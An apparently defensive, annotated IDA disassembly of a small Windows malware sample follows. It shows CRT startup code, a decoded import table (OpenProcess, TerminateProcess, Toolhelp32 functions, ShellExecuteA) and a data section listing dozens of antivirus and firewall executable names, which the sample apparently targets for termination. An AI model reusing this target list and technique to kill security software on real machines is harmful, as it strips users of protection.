; The two unlabeled fragments after start endp are the SEH filter and
; __except body belonging to the frame that start installs (handler
; loc_401A30 pushed at start+A). The scope table dword_4010A8 presumably
; points at this pair -- confirm against its contents.
.text:004019EE                 mov     eax, [ebp-14h]          ; filter: assumes [ebp-14h] is the EXCEPTION_POINTERS* slot of the _except_handler3 frame -- confirm
.text:004019F1                 mov     ecx, [eax]              ; ->ExceptionRecord
.text:004019F3                 mov     ecx, [ecx]              ; ->ExceptionCode
.text:004019F5                 mov     [ebp-78h], ecx          ; keep the code for the __except body below
.text:004019F8                 push    eax                     ; EXCEPTION_POINTERS*
.text:004019F9                 push    ecx                     ; exception code
.text:004019FA                 call    _XcptFilter             ; CRT filter decides the disposition
.text:004019FF                 pop     ecx
.text:00401A00                 pop     ecx
.text:00401A01                 retn
.text:00401A02 ; ---------------------------------------------------------------------------
.text:00401A02                 mov     esp, [ebp-18h]          ; __except body: esp that start saved in var_18 at 4018D3
.text:00401A05                 push    dword ptr [ebp-78h]     ; exit status = the exception code stored above
.text:00401A08                 call    ds:_exit                ; immediate termination, no CRT teardown
.text:00401A0E ; [00000006 BYTES: COLLAPSED FUNCTION _XcptFilter. PRESS KEYPAD "+" TO EXPAND]
.text:00401A14 ; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
.text:00401A1A ; [00000012 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
.text:00401A2C ; ---------------------------------------------------------------------------
.text:00401A2C
.text:00401A2C loc_401A2C:                             ; DATA XREF: start+77o
.text:00401A2C                 xor     eax, eax                ; user matherr stub: always returns 0 (never registered, because dword_40228C == 1)
.text:00401A2E                 retn
.text:00401A2F ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
.text:00401A30 ; ---------------------------------------------------------------------------
.text:00401A30
.text:00401A30 loc_401A30:                             ; DATA XREF: start+Ao
.text:00401A30                 jmp     ds:_except_handler3     ; SEH handler thunk installed by start
.text:00401A36 ; [00000006 BYTES: COLLAPSED FUNCTION _controlfp.
PRESS KEYPAD "+" TO EXPAND]
; 401A3C-401B47: 20-byte records whose first two dwords are (1B48h,1000h),
; (1B55h,1040h), (1B60h,1098h), (1B6Ch,10A0h). 1B48h/1B55h/1B60h/1B6Ch are the
; RVAs of the four DLL-name strings decoded below, and 1000h/1040h are where the
; KERNEL32 and MSVCRT import slots sit in .idata, so this reads as a
; (DLL name, IAT) table. That is NOT the IMAGE_IMPORT_DESCRIPTOR field order,
; so confirm against the PE import directory before relying on it.
.text:00401A3C                 dd 3 dup(0)
.text:00401A48                 dd 1B48h, 1000h, 3 dup(0)
.text:00401A5C                 dd 1B55h, 1040h, 3 dup(0)
.text:00401A70                 dd 1B60h, 1098h, 3 dup(0)
.text:00401A84                 dd 1B6Ch, 10A0h, 2Fh dup(0)
; 401B48: IDA left these as dwords; read little-endian they are ASCII:
; "KERNEL32.DLL", "MSVCRT.dll", "SHELL32.dll", "USER32.dll", followed by
; hint/name entries (WORD hint, NUL-terminated name) for OpenProcess,
; CloseHandle, Process32Next, TerminateProcess and Process32First.
; The named db strings that follow continue the same hint/name table.
.text:00401B48                 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56534D00h, 2E545243h
.text:00401B48                 dd 6C6C64h, 4C454853h, 2E32334Ch, 6C6C64h, 52455355h, 642E3233h
.text:00401B48                 dd 6C6Ch, 704F0000h, 72506E65h, 7365636Fh, 73h, 736F6C43h
.text:00401B48                 dd 6E614865h, 656C64h, 72500000h, 7365636Fh, 4E323373h
.text:00401B48                 dd 747865h, 65540000h, 6E696D72h, 50657461h, 65636F72h
.text:00401B48                 dd 7373h, 636F7250h, 33737365h, 72694632h, 7473h
.text:00401BC8 aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
.text:00401BE1                 align 2
.text:00401BE2 aDeletefilea    db 'DeleteFileA',0
.text:00401BEE                 align 10h
.text:00401BF0 aSleep          db 'Sleep',0
.text:00401BF6                 align 4
.text:00401BF8 aGettemppatha   db 'GetTempPathA',0
.text:00401C05                 align 2
.text:00401C06 aGetsystemdirec db 'GetSystemDirectoryA',0
.text:00401C1A                 align 4
.text:00401C1C aGetwindowsdire db 'GetWindowsDirectoryA',0
.text:00401C31                 align 2
.text:00401C32 aGetcurrentdire db 'GetCurrentDirectoryA',0
.text:00401C47                 align 4
.text:00401C48 aGetmodulefilen db 'GetModuleFileNameA',0
.text:00401C5B                 align 4
.text:00401C5C aGetmodulehandl db 'GetModuleHandleA',0
.text:00401C6D                 align 2
.text:00401C6E aGetstartupinfo db 'GetStartupInfoA',0
.text:00401C7E                 align 10h
.text:00401C80 a__getmainargs  db '__getmainargs',0
.text:00401C8E                 align 10h
.text:00401C90 aStrstr         db 'strstr',0
.text:00401C97                 align 4
.text:00401C98 aFclose         db 'fclose',0
.text:00401C9F                 align 10h
.text:00401CA0 aFputc          db 'fputc',0
.text:00401CA6                 align 4
.text:00401CA8 aFgetc          db 'fgetc',0
.text:00401CAE                 align 10h
.text:00401CB0 aFread          db 'fread',0
.text:00401CB6                 align 4
.text:00401CB8 aFseek          db 'fseek',0
.text:00401CBE                 align 10h
.text:00401CC0 aFopen          db 'fopen',0
.text:00401CC6                 align 4
.text:00401CC8 a_exit          db '_exit',0
.text:00401CCE                 align 10h
.text:00401CD0 a_xcptfilter    db '_XcptFilter',0
; 401CDC: the remaining hint/name entries, again as raw dwords; decoded they
; are exit, _acmdln, tmpnam, _initterm, __setusermatherr, _adjust_fdiv,
; __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp,
; ShellExecuteA, wsprintfA. Note the whole import-name table lives inside
; .text rather than in a dedicated import section.
.text:00401CDC                 dd 78650000h, 7469h, 6D63615Fh, 6E6C64h, 6D740000h, 6D616E70h
.text:00401CDC                 dd 695F0000h, 7474696Eh, 6D7265h, 5F5F0000h, 75746573h
.text:00401CDC                 dd 6D726573h, 65687461h, 7272h, 6A64615Fh, 5F747375h, 76696466h
.text:00401CDC                 dd 5F5F0000h, 635F5F70h, 6F6D6D6Fh, 6564h, 5F705F5Fh, 6F6D665Fh
.text:00401CDC                 dd 6564h, 65735F5Fh, 70615F74h, 79745F70h, 6570h, 6378655Fh
.text:00401CDC                 dd 5F747065h, 646E6168h, 3372656Ch, 635F0000h, 72746E6Fh
.text:00401CDC                 dd 70666C6Fh, 68530000h, 456C6C65h, 75636578h, 416574h
.text:00401CDC                 dd 73770000h, 6E697270h, 416674h, 1Fh dup(0)
.text:00401CDC _text           ends
.text:00401CDC
.data:00402000 ; Section 2. (virtual address 00002000)
.data:00402000 ; Virtual size : 000002AC ( 684.)
.data:00402000 ; Section size in file : 00000400 ( 1024.)
.data:00402000 ; Offset to raw data for section: 00001200
.data:00402000 ; Flags C0000040: Data Readable Writable
.data:00402000 ; Alignment : default
.data:00402000 ; ===========================================================================
.data:00402000
.data:00402000 ; Segment type: Pure data
.data:00402000 ; Segment permissions: Read/Write
.data:00402000 _data           segment para public 'DATA' use32
.data:00402000                 assume cs:_data
.data:00402000 ;org 402000h
; unk_402000..unk_40200C are the four _initterm table bounds pushed by start;
; every byte is zero, so both initialiser tables are empty.
.data:00402000 unk_402000      db 0                    ; DATA XREF: start+C0o
.data:00402001                 db 0
.data:00402002                 db 0
.data:00402003                 db 0
.data:00402004 unk_402004      db 0                    ; DATA XREF: start+BBo
.data:00402005                 db 0
.data:00402006                 db 0
.data:00402007                 db 0
.data:00402008 unk_402008      db 0                    ; DATA XREF: start+8Do
.data:00402009                 db 0
.data:0040200A                 db 0
.data:0040200B                 db 0
.data:0040200C unk_40200C      db 0                    ; DATA XREF: start+88o
.data:0040200D                 db 0
.data:0040200E                 db 0
.data:0040200F                 db 0
; String table referenced from sub_4010C0 (one XREF per entry; the offsets run
; backwards from +32D to +7, i.e. the function references them in reverse order).
; Every entry is the executable name of a security product, which is consistent
; with the analyst's KillProcess1/KillProcess2 labels in WinMain, but how
; sub_4010C0 consumes them is outside this view. The list is usable as a
; detection signature for this sample.
.data:00402010 ; char aAvpcc_exe[]
.data:00402010 aAvpcc_exe      db 'AVPCC.EXE',0        ; DATA XREF: sub_4010C0+32Do
.data:0040201A                 align 4
.data:0040201C ; char aAvkserv_exe[]
.data:0040201C aAvkserv_exe    db 'AVKSERV.EXE',0      ; DATA XREF: sub_4010C0+31Co
.data:00402028 ; char
aEcengine_exe[]
; Continuation of the sub_4010C0 string table (security-product executable
; names, one XREF each) that begins at aAvpcc_exe above.
.data:00402028 aEcengine_exe   db 'ECENGINE.EXE',0     ; DATA XREF: sub_4010C0+30Bo
.data:00402035                 align 4
.data:00402038 ; char aFpWin_exe[]
.data:00402038 aFpWin_exe      db 'FP-WIN.EXE',0       ; DATA XREF: sub_4010C0+2FAo
.data:00402043                 align 4
.data:00402044 ; char aVettray_exe[]
.data:00402044 aVettray_exe    db 'VETTRAY.EXE',0      ; DATA XREF: sub_4010C0+2E9o
.data:00402050 ; char aAckwin32_exe[]
.data:00402050 aAckwin32_exe   db 'ACKWIN32.EXE',0     ; DATA XREF: sub_4010C0+2D8o
.data:0040205D                 align 10h
.data:00402060 ; char aAvnt_exe[]
.data:00402060 aAvnt_exe       db 'AVNT.EXE',0         ; DATA XREF: sub_4010C0+2C7o
.data:00402069                 align 4
.data:0040206C ; char aEsafe_exe[]
.data:0040206C aEsafe_exe      db 'ESAFE.EXE',0        ; DATA XREF: sub_4010C0+2B6o
.data:00402076                 align 4
.data:00402078 ; char aFprot_exe[]
.data:00402078 aFprot_exe      db 'FPROT.EXE',0        ; DATA XREF: sub_4010C0+2A1o
.data:00402082                 align 4
.data:00402084 ; char aFProt95_exe[]
.data:00402084 aFProt95_exe    db 'F-PROT95.EXE',0     ; DATA XREF: sub_4010C0+28Co
.data:00402091                 align 4
.data:00402094 ; char aIomon98_exe[]
.data:00402094 aIomon98_exe    db 'IOMON98.EXE',0      ; DATA XREF: sub_4010C0+277o
.data:004020A0 ; char aAvwin95_exe[]
.data:004020A0 aAvwin95_exe    db 'AVWIN95.EXE',0      ; DATA XREF: sub_4010C0+251o
.data:004020AC ; char aAve32_exe[]
.data:004020AC aAve32_exe      db 'AVE32.EXE',0        ; DATA XREF: sub_4010C0+23Co
.data:004020B6                 align 4
.data:004020B8 ; char aAntiTrojan_exe[]
.data:004020B8 aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0  ; DATA XREF: sub_4010C0+227o
.data:004020C8 ; char a_avpcc_exe[]
.data:004020C8 a_avpcc_exe     db '_AVPCC.EXE',0       ; DATA XREF: sub_4010C0+212o
.data:004020D3                 align 4
.data:004020D4 ; char aApvxdwin_exe[]
.data:004020D4 aApvxdwin_exe   db 'APVXDWIN.EXE',0     ; DATA XREF: sub_4010C0+1FDo
.data:004020E1                 align 4
.data:004020E4 ; char aClaw95cf_exe[]
.data:004020E4 aClaw95cf_exe   db 'CLAW95CF.EXE',0     ; DATA XREF: sub_4010C0+1E8o
.data:004020F1                 align 4
.data:004020F4 ; char a_findviru_exe[]
.data:004020F4 a_findviru_exe  db '_FINDVIRU.EXE',0    ; DATA XREF: sub_4010C0+1D3o
.data:00402102                 align 4
.data:00402104 ; char aFindviru_exe[]
.data:00402104 aFindviru_exe   db 'FINDVIRU.EXE',0     ; DATA XREF: sub_4010C0+1BEo
.data:00402111                 align 4
.data:00402114 ; char aNavnt_exe[]
.data:00402114 aNavnt_exe      db 'NAVNT.EXE',0        ; DATA XREF: sub_4010C0+1A9o
.data:0040211E                 align 10h
.data:00402120 ; char aVet95_exe[]
.data:00402120 aVet95_exe      db 'VET95.EXE',0        ; DATA XREF: sub_4010C0+194o
.data:0040212A                 align 4
.data:0040212C ; char aScan32_exe[]
.data:0040212C aScan32_exe     db 'SCAN32.EXE',0       ; DATA XREF: sub_4010C0+17Fo
.data:00402137                 align 4
.data:00402138 ; char aRav7_exe[]
.data:00402138 aRav7_exe       db 'RAV7.EXE',0         ; DATA XREF: sub_4010C0+16Ao
.data:00402141                 align 4
.data:00402144 ; char aNavapw32_exe[]
.data:00402144 aNavapw32_exe   db 'NAVAPW32.EXE',0     ; DATA XREF: sub_4010C0+155o
.data:00402151                 align 4
.data:00402154 ; char aVsmain_exe[]
.data:00402154 aVsmain_exe     db 'VSMAIN.EXE',0       ; DATA XREF: sub_4010C0+12Fo
.data:0040215F                 align 10h
.data:00402160 ; char aGuarddog_exe[]
.data:00402160 aGuarddog_exe   db 'GUARDDOG.EXE',0     ; DATA XREF: sub_4010C0+11Ao
.data:0040216D                 align 10h
.data:00402170 ; char aRulaunch_exe[]
.data:00402170 aRulaunch_exe   db 'RULAUNCH.EXE',0     ; DATA XREF: sub_4010C0+105o
.data:0040217D                 align 10h
.data:00402180 ; char aAlogserv_exe[]
.data:00402180 aAlogserv_exe   db 'ALOGSERV.EXE',0     ; DATA XREF: sub_4010C0+F0o
.data:0040218D                 align 10h
.data:00402190 ; char aOgrc_exe[]
.data:00402190 aOgrc_exe       db 'OGRC.EXE',0         ; DATA XREF: sub_4010C0+DAo
.data:00402199                 align 4
.data:0040219C ; char aNavapsvc_exe[]
.data:0040219C aNavapsvc_exe   db 'NAVAPSVC.EXE',0     ; DATA XREF: sub_4010C0+C5o
.data:004021A9                 align 4
.data:004021AC ; char aSmss_exe[]
.data:004021AC aSmss_exe       db 'SMSS.EXE',0         ; DATA XREF: sub_4010C0+B0o
.data:004021B5                 align 4
.data:004021B8 ; char aNsplugin_exe[]
.data:004021B8 aNsplugin_exe   db 'NSPLUGIN.EXE',0     ; DATA XREF: sub_4010C0+9Bo
.data:004021C5                 align 4
.data:004021C8 ; char aNod32_exe[]
.data:004021C8 aNod32_exe      db 'NOD32.EXE',0        ; DATA XREF: sub_4010C0+86o
.data:004021D2                 align 4
.data:004021D4 ; char a_avpm_exe[]
.data:004021D4 a_avpm_exe      db '_AVPM.EXE',0        ; DATA XREF: sub_4010C0+71o
.data:004021DE                 align 10h
.data:004021E0 ; char aAmon_exe[]
.data:004021E0 aAmon_exe       db 'AMON.EXE',0         ; DATA XREF: sub_4010C0+5Co
.data:004021E9                 align 4
.data:004021EC ; char aNavwnt_exe[]
.data:004021EC aNavwnt_exe     db 'NAVWNT.EXE',0       ; DATA XREF: sub_4010C0+46o
.data:004021F7                 align 4
.data:004021F8 ; char aNavw32_exe[]
.data:004021F8 aNavw32_exe     db 'NAVW32.EXE',0       ; DATA XREF: sub_4010C0+31o
.data:00402203                 align 4
.data:00402204 ; char aSpider_exe[]
.data:00402204 aSpider_exe     db 'SPIDER.EXE',0       ; DATA XREF: sub_4010C0+1Co
.data:0040220F                 align 10h
.data:00402210 ; char aAvpm_exe[]
.data:00402210 aAvpm_exe       db 'AVPM.EXE',0         ; DATA XREF: sub_4010C0+7o
.data:00402219                 align 4
; From here to aZonalarm_exe the XREFs switch to sub_401405 (offsets +6B
; down to +5); the names suggest personal-firewall products, which is a second,
; separate list consumed by that routine (not visible here).
.data:0040221C ; char aAtguard_exe[]
.data:0040221C aAtguard_exe    db 'ATGUARD.EXE',0      ; DATA XREF: sub_401405+6Bo
.data:00402228 ; char aBlackice_exe[]
.data:00402228 aBlackice_exe   db 'BLACKICE.EXE',0     ; DATA XREF: sub_401405+5Ao
.data:00402235                 align 4
.data:00402238 ; char aLookout_exe[]
.data:00402238 aLookout_exe    db 'LOOKOUT.EXE',0      ; DATA XREF: sub_401405+49o
.data:00402244 ; char aCmgrdian_exe[]
.data:00402244 aCmgrdian_exe   db 'CMGRDIAN.EXE',0     ; DATA XREF: sub_401405+38o
.data:00402251                 align 4
.data:00402254 ; char aIamapp_exe[]
.data:00402254 aIamapp_exe     db 'IAMAPP.EXE',0       ; DATA XREF: sub_401405+27o
.data:0040225F                 align 10h
.data:00402260 ; char aOutpost_exe[]
.data:00402260 aOutpost_exe    db 'OUTPOST.EXE',0      ; DATA XREF: sub_401405+16o
.data:0040226C ; char aZonalarm_exe[]
.data:0040226C aZonalarm_exe   db 'ZONALARM.EXE',0     ; DATA XREF: sub_401405+5o
.data:00402279                 align 4
; fopen modes and the wsprintfA format used by WinMain to build the two
; temp-file paths it writes ("wb") after reading its own image ("rb").
.data:0040227C ; char aWb[]
.data:0040227C aWb             db 'wb',0               ; DATA XREF: WinMain(x,x,x,x):loc_40172Do
.data:0040227F                 align 10h
.data:00402280 ; char aSSS[]
.data:00402280 aSSS            db '%s%s%s',0           ; DATA XREF: WinMain(x,x,x,x)+BFo
.data:00402287                 align 4
.data:00402288 ; char aRb[]
.data:00402288 aRb             db 'rb',0               ; DATA XREF: WinMain(x,x,x,x)+27o
.data:0040228B                 align 4
; CRT configuration globals read/written only by start (see its XREFs).
.data:0040228C dword_40228C    dd 1                    ; DATA XREF: start+6Fr
                                                       ; nonzero => start skips __setusermatherr
.data:00402290 dword_402290    dd 0                    ; DATA XREF: start+A3r
                                                       ; dowildcard argument to __getmainargs
.data:00402294 dword_402294    dd 0                    ; DATA XREF: start+97r
                                                       ; copied into the _startupinfo passed to __getmainargs
.data:00402298 dword_402298    dd 0                    ; DATA XREF: start+56r
                                                       ; stored through __p__commode()
.data:0040229C dword_40229C    dd 0                    ; DATA XREF: start+48r
                                                       ; stored through __p__fmode()
.data:004022A0 dword_4022A0    dd 0                    ; DATA XREF: start+34w
                                                       ; set to -1 by start (purpose not recoverable here)
.data:004022A4 dword_4022A4    dd 0                    ; DATA XREF: start+3Bw
                                                       ; set to -1 by start (purpose not recoverable here)
.data:004022A8 dword_4022A8    dd 0                    ; DATA XREF: start+65w
                                                       ; receives msvcrt's _adjust_fdiv value
.data:004022AC                 align 200h
.data:004022AC _data           ends
.data:004022AC
.data:004022AC
.data:004022AC                 end start